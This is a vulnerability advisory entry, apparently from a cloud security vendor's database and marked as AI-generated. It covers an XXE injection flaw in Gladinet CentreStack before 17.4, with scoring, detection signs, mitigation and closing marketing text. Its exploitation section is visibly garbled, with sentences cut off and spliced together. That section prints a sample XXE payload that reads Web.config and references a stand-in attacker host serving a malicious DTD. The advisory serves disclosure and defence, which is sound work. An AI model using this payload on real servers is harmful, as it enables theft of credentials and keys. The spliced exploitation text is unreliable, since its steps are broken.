
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-54366 is an XML External Entity (XXE) injection vulnerability in Gladinet CentreStack affecting all versions before 17.4. It allows unauthenticated remote attackers to exfiltrate arbitrary files from the server by supplying a malicious URL to the SharePoint storage configuration handler. The vulnerability was published on July 30, 2026, with a patch available in version 17.4. It carries a CVSS v3.1 base score of 7.5 (High) and a CVSS v4.0 base score of 8.7 (High) (Github Advisory, VulnCheck).
The vulnerability is classified as CWE-611 (Improper Restriction of XML External Entity Reference). The unauthenticated StorageConfig endpoint, which handles SharePoint storage configuration, accepts a user-supplied URL and fetches the resource without adequate validation. An attacker can point this URL to an attacker-controlled server hosting malicious XML containing external DTD references, causing the CentreStack server to parse the XML and exfiltrate local file contents out-of-band — a classic Server-Side Request Forgery (SSRF)-assisted XXE attack. No authentication or user interaction is required, and the attack complexity is low (Github Advisory, VulnCheck).
Successful exploitation allows unauthenticated attackers to read arbitrary files from the CentreStack server's filesystem. The most sensitive target is Web.config, which may contain database credentials and cryptographic key material. Exposure of these secrets could enable further attacks such as database compromise, authentication token forgery, or full application takeover, significantly amplifying the initial confidentiality breach (Github Advisory, VulnCheck).
As of the time of disclosure, there is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation (Github Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.287% (21st percentile), indicating a currently low probability of exploitation within 30 days. However, the attack is fully automatable — requiring no authentication, no user interaction, and low complexity — which increases the risk of future exploitation if left unpatched.
http://attacker.com/evil.dtd) containing an external entity definition that references a sensitive local file, such as:<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/inetpub/wwwroot/Web.config">
]>
<foo>&xxe;</foo>StorageConfig endpoint, supplying the attacker-controlled URL as the SharePoint storage configuration URL parameter.Web.config (Github Advisory, VulnCheck).StorageConfig endpoint; unusual outbound connections carrying file content in request bodies or DNS query strings.StorageConfig endpoint with external URLs as parameters, especially from unfamiliar or automated source IPs; repeated requests from a single IP in a short timeframe.Web.config access timestamps may reveal unexpected reads.Upgrade CentreStack to version 17.4 or later, which contains the fix for this vulnerability (Github Advisory, VulnCheck). As a workaround prior to patching, restrict network access to the StorageConfig endpoint so it is only reachable by trusted administrators, using firewall rules or reverse proxy ACLs. Additionally, implement XML parser hardening by disabling external entity resolution and DTD processing at the application or server level where possible.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."